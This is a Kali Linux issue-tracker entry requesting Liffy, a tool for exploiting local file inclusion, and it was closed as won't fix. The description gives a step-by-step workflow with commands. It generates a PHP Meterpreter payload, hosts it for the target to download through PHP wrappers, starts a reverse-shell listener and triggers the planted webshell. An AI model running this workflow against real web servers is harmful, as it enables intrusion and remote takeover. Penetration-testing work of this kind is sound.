View Issue Details

IDProjectCategoryView StatusLast Update
0001415Kali LinuxNew Tool Requestspublic2020-02-10 18:15
Reportersaberzaid Assigned To 
PrioritynormalSeverityfeatureReproducibilityhave not tried
Status closedResolutionwon't fix 
Summary0001415: Liffy - Local File Inclusion Exploitation Tool
Description

Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.
Exploitation
Once you have found an local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.
./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python's HTTP web servers.
http-server /tmp -p 8000

If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.
msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should get see a new Meterpreter session spawn
curl --silent http://target/vuln/7ka0tqsq.php

download:
https://github.com/rotlogix/liffy

Activities

jaimechiquita111

jaimechiquita111

2014-07-24 22:39

reporter   ~0002371

Last edited: 2014-07-24 22:40

Nice one Mr saberzaid...
I've submited the same but after you, sorry to Mr dookie for the duplication.

I've never readed about Local File Inclusion Exploitation Tool, maybe metasploitable will give positives?!?

g0tmi1k

g0tmi1k

2018-01-29 15:20

administrator   ~0008509

To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will for us):

  • [Name] - The name of the tool
  • [Version] - What version of the tool should be added?
    --- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
  • [Homepage] - Where can the tool be found online? Where to go to get more information?
  • [Download] - Where to go to get the tool?
  • [Author] - Who made the tool?
  • [Licence] - How is the software distributed? What conditions does it come with?
  • [Description] - What is the tool about? What does it do?
  • [Dependencies] - What is needed for the tool to work?
  • [Similar tools] - What other tools are out there?
  • [How to install] - How do you compile it?
  • [How to use] - What are some basic commands/functions to demonstrate it?
g0tmi1k

g0tmi1k

2018-03-13 10:51

administrator   ~0008920

How is the tool say better than LFISuite? 0004305

g0tmi1k

g0tmi1k

2020-02-10 18:15

administrator   ~0012196

Project now 404's

Issue History

Date Modified Username Field Change
2014-06-12 22:36 saberzaid New Issue
2014-06-29 19:52 vichet Issue cloned: 0001467
2014-07-24 22:39 jaimechiquita111 Note Added: 0002371
2014-07-24 22:40 jaimechiquita111 Note Edited: 0002371
2014-07-24 22:40 jaimechiquita111 Note Edited: 0002371
2018-01-29 15:20 g0tmi1k Note Added: 0008509
2018-03-13 10:51 g0tmi1k Note Added: 0008920
2019-12-09 13:30 g0tmi1k Severity minor => feature
2020-02-10 18:15 g0tmi1k Note Added: 0012196
2020-02-10 18:15 g0tmi1k Status new => closed
2020-02-10 18:15 g0tmi1k Resolution open => won't fix